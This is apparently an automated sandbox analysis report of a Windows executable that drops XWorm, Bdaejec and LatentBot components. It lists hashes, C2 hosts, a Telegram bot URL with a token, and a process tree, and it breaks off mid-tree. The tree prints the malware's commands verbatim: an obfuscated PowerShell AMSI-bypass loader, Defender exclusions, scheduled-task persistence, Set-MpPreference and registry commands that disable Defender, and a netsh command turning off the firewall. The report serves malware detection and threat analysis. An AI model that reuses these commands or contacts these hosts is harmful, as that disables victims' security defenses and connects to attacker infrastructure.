Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/05/2025, 00:46

General

  • Target

    250519-z3llfszks4.exe

  • Size

    285KB

  • MD5

    20841606ce69632f258221219aeee09b

  • SHA1

    b72918797186774598792c47b66d5857be59f576

  • SHA256

    1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

  • SHA512

    aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e

  • SSDEEP

    6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI

Malware Config

Extracted

Family

xworm

Version

3.1

C2

grayhatgroupontop.zapto.org:1177

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Extracted

Family

latentbot

C2

grayhatgroupontop.zapto.org

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 5 IoCs

    Bdaejec is backdoor written in C++.

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Latentbot family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 43 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{59a02824-c996-495a-a3bb-0d0aef5ec34f}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1584
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:744
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1028
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1092
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1108
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1172
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2844
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MVKPIfBtMWRx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JSPZKwpHVeqSXx,[Parameter(Position=1)][Type]$jjPceJbftj)$uDkKYAhAQbC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'el'+'e'+'g'+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$uDkKYAhAQbC.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$JSPZKwpHVeqSXx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');$uDkKYAhAQbC.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+'o'+[Char](116)+''+','+''+[Char](86)+'ir'+[Char](116)+'ua'+[Char](108)+'',$jjPceJbftj,$JSPZKwpHVeqSXx).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+'nag'+[Char](101)+''+'d'+'');Write-Output $uDkKYAhAQbC.CreateType();}$CzlBVZNNSzOuQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'in32.'+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$snQizwzteddOkc=$CzlBVZNNSzOuQ.GetMethod(''+'G'+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+'res'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JhVzOlVkXFqTcTVCqXc=MVKPIfBtMWRx @([String])([IntPtr]);$ocDMZvbhOPeJKYGXuVrEyf=MVKPIfBtMWRx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UKEUneCuLbV=$CzlBVZNNSzOuQ.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'l'+'l'+'')));$FyEjhXWLyFHIWH=$snQizwzteddOkc.Invoke($Null,@([Object]$UKEUneCuLbV,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+'y'+'A'+'')));$ieCZrJiapcTQeFbKO=$snQizwzteddOkc.Invoke($Null,@([Object]$UKEUneCuLbV,[Object]('V'+'i'+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$oeMfxAC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FyEjhXWLyFHIWH,$JhVzOlVkXFqTcTVCqXc).Invoke('a'+'m'+'s'+[Char](105)+'.'+'d'+''+[Char](108)+'l');$JjvGvEePuwNbBqKyn=$snQizwzteddOkc.Invoke($Null,@([Object]$oeMfxAC,[Object]('A'+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+'a'+[Char](110)+'B'+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$BUYxZhNXwZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ieCZrJiapcTQeFbKO,$ocDMZvbhOPeJKYGXuVrEyf).Invoke($JjvGvEePuwNbBqKyn,[uint32]8,4,[ref]$BUYxZhNXwZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JjvGvEePuwNbBqKyn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ieCZrJiapcTQeFbKO,$ocDMZvbhOPeJKYGXuVrEyf).Invoke($JjvGvEePuwNbBqKyn,[uint32]8,0x20,[ref]$BUYxZhNXwZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+''+[Char](57)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1408
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:5336
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:1560
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:2392
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1188
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1252
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1296
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1328
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1436
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2592
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1448
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1524
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1536
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1656
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1680
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1736
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1772
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1816
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1884
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1892
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1976
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1848
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2148
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2212
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2268
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2428
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2436
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2652
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Suspicious use of UnmapMainImage
                                                                      PID:2704
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2776
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2800
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2812
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2828
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3004
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3092
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3500
                                                                                  • C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:884
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1180
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:4008
                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5488
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4424
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:724
                                                                                    • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1640
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8C42.tmp\8C43.tmp\8C44.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                        4⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:5532
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4152
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1628
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2032
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3900
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5620
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3924
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3336
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5832
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3916
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3064
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:400
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4136
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3336
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4816
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5036
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4224
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                            6⤵
                                                                                              PID:2712
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4612
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                              6⤵
                                                                                                PID:3244
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4836
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                6⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:1876
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                              5⤵
                                                                                                PID:1728
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                5⤵
                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                PID:2560
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                5⤵
                                                                                                  PID:3592
                                                                                                • C:\Windows\system32\reg.exe
